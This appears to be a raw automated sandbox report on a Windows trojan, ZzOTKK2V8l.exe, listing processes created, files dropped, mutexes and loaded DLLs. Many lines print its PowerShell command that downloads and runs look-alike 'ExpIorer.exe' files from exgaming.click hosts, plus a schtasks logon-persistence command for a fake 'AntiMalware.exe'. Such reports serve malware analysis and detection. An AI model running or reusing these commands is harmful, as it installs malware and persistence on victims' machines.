                            Source: AntiMalware.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@48/33@4/1
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeFile created: C:\Users\user\AppData\Roaming\MyDataJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4456:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4448:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeMutant created: \Sessions\1\BaseNamedObjects\izslwuidilziewad
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeFile created: C:\Users\user\AppData\Local\Temp\tmp124D.tmpJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat""
                            Source: ZzOTKK2V8l.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: ZzOTKK2V8l.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: ZzOTKK2V8l.exeReversingLabs: Detection: 50%
                            Source: ZzOTKK2V8l.exeVirustotal: Detection: 55%
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeFile read: C:\Users\user\Desktop\ZzOTKK2V8l.exeJump to behavior
                            Source: unknownProcess created: C:\Users\user\Desktop\ZzOTKK2V8l.exe "C:\Users\user\Desktop\ZzOTKK2V8l.exe"
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exit
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat""
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: unknownProcess created: C:\Users\user\AppData\Roaming\AntiMalware.exe C:\Users\user\AppData\Roaming\AntiMalware.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\AntiMalware.exe "C:\Users\user\AppData\Roaming\AntiMalware.exe"
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exitJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' & exitJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp124D.tmp.bat""Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe') Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe') Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "AntiMalware" /tr '"C:\Users\user\AppData\Roaming\AntiMalware.exe"' Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 3Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\AntiMalware.exe "C:\Users\user\AppData\Roaming\AntiMalware.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exitJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', '%Temp%\\ExpIorer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', '%Temp%\\ExplIorer.exe') & powershell Start-Process -FilePath '%Temp%\\ExpIorer.exe' & powershell Start-Process -FilePath '%Temp%\\ExplIorer.exe' & exit
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (New-Object System.Net.WebClient).DownloadFile('http://xcu5.exgaming.click', 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe')
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExpIorer.exe'
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Start-Process -FilePath 'C:\Users\user\AppData\Local\Temp\\ExplIorer.exe'
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\ZzOTKK2V8l.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
                            Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Roaming\AntiMalware.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
